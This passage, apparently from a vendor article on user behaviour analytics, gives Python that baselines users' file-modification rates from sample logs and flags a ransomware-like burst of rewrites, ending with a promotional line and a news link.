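BASELINE_LOG = [f"2017-03-01T09:{m:02d}:00 alice modify /share/fin/r{m}.xlsx"
                for m in range(0, 30, 5)] + [
    "2017-03-01T09:02:00 bob read /share/hr/policy.pdf",
    "2017-03-01T09:12:00 bob modify /share/hr/roster.xlsx"]

# Constructed "live" log: alice works normally, then bob's (stolen) account
# rewrites 30 files in 30 seconds, the footprint an encrypting ransomware leaves.
LIVE_LOG = ["2017-03-01T10:00:00 alice modify /share/fin/budget.xlsx",
            "2017-03-01T10:04:00 alice modify /share/fin/notes.docx"] + [
    f"2017-03-01T10:05:{s:02d} bob modify /share/hr/f{s}.docx.locked"
    for s in range(30)]

def parse_line(line):
    """Parse '<ISO timestamp> <user> <action> <path>' into a tuple."""
    ts, user, action, path = line.split(" ", 3)
    return datetime.fromisoformat(ts), user, action, path

def windowed_modifies(lines, window=WINDOW):
    """Yield (ts, user, n) with n = the user's modify events in the trailing window."""
    recent = defaultdict(deque)
    for ts, user, action, _ in map(parse_line, lines):
        if action != "modify":
            continue
        q = recent[user]
        q.append(ts)
        while ts - q[0] > window:
            q.popleft()
        yield ts, user, len(q)

def build_baseline(lines):
    """Profile step: each user's peak modify count per window during normal use."""
    peaks = defaultdict(int)
    for _, user, n in windowed_modifies(lines):
        peaks[user] = max(peaks[user], n)
    return dict(peaks)

def detect_bursts(lines, baseline, factor=5, floor=20):
    """Alert once per user when the windowed count exceeds both factor x baseline
    and an absolute floor (a user with no profile is held to the floor)."""
    alerts, alerted = [], set()
    for ts, user, n in windowed_modifies(lines):
        if n > max(floor, factor * baseline.get(user, 0)) and user not in alerted:
            alerted.add(user)
            alerts.append((user, ts.isoformat(), n))
    return alerts
```

Running `detect_bursts(LIVE_LOG, build_baseline(BASELINE_LOG))` flags bob on the 21st rewrite within the window while alice’s ordinary edits stay silent; the absolute floor keeps a low-activity account from being flagged for a handful of edits.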

Try UBA: it halts ransomware and prevents any further disruptions in government operations.

Further reading:

1 http://www.govtech.com/security/Ransomware-Poses-Tremendous-Threat-to-Police-Departments.html